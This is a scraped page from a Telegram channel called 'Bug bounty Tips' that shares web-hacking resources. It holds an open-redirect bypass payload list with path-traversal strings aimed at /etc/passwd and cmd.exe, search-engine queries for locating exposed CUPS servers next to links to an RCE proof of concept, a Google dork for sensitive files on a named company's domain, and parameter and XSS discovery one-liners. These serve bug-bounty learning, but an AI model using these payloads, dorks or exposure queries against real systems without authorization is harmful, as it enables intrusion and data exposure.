Bug bounty Tips
Kanalga Telegramāda oātish
š”ļø Cybersecurity enthusiast | š» Helping secure the digital world | š Web App Tester | šµļøāāļø OSINT Specialist Admin: @laazy_hack3r
Ko'proq ko'rsatish6 129
Obunachilar
+1424 soatlar
+1047 kunlar
+34830 kunlar
Postlar arxiv
6 129
CVE-2024-47076/CVE-2024-47175/CVE-2024-47176/CVE-2024-47177: Multiple CUPS flaws enable Linux remote code execution
A remote unauthenticated attacker can silently replace existing printersā (or install new ones) IPP urls with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer).
PoC: https://github.com/RickdeJager/cupshax
This PoC uses dns-sd printer discovery, so the target must be able to receive the broadcast message, i.e. be on the same network.
CUPS Report and POC leaked online: https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1
Refer: https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8
Search Query:
HUNTER: header.server="CUPS" SHODAN: product:"CUPS(IPP)" server: cups FOFA: server="CUPS" ZoomEye: app:"CUPS" +title:"CUPS"P.S. 2.9M+ Services are found on hunter.how yearly
6 129
Fuzzing from First Principles
https://zerodayengineering.com/research/slides/FuzzingFromFirstPrinciples.pdf
6 129
Finally working on this and I will be back becoming more and more better guys so that I can help you guys understand things on how it really works...
6 129
you can try this effective manual openredirect Bypass:
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. IP address variants:
- http://3232235777 (decimal notation of an IP)
- http://0xC0A80001 (hex notation of IP)
- http://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- http://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:password@google.com/
- http://@google.com
22. Combination of userinfo and traversal:
- https://admin:password@google.com/../../etc/passwd
6 129
For finding hidden parameter:
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"
6 129
Repost from šš¤šØš©šØšš
For finding hidden parameter:
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"
6 129
How to Create a Fun, Engaging, and Long-Lasting Bug Bounty Program for Your Community: https://medium.com/@GrowthKingdom/how-to-create-a-fun-engaging-and-long-lasting-bug-bounty-program-for-your-community-f67da7fb230a?source=rss------bug_bounty-5
6 129
ā”TOP 100 Vulnerabilities Step-by-Step Guide Handbook
https://github.com/Zorono/Learning-PDFs/blob/main/TOP%20100%20Vulnerabilities%20Step-by-Step%20Guide%20Handbook.pdf
6 129
GitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)
https://github.com/securelayer7/CVE-2024-38856_Scanner
6 129
try this google dork to find senstive files on website:
site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)
6 129
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss6 129
āļøSubowner - A Simple python based tool to check for subdomain takeovers in mass scanning. Supports, AWS, Fastly, Shopify, Azure etc.
šØhttps://github.com/ifconfig-me/subowner
6 129
ā Penetration Testing Roadmap Public: https://github.com/securitycipher/penetration-testing-roadmap
6 129
š Introduction to SQL Injection
š https://hacklido.com/blog/910-introduction-to-sql-injection
6 129
Repost from The Bug Bounty Hunter
Pentesting for Web Applications
https://www.hackerone.com/penetration-testing/web-applications
6 129
Top Hacking Books for 2024 (plus Resources): FREE and Paid
Tue, 17 Sep 2024 12:56:36 GMT
https://medium.com/p/394601c01904
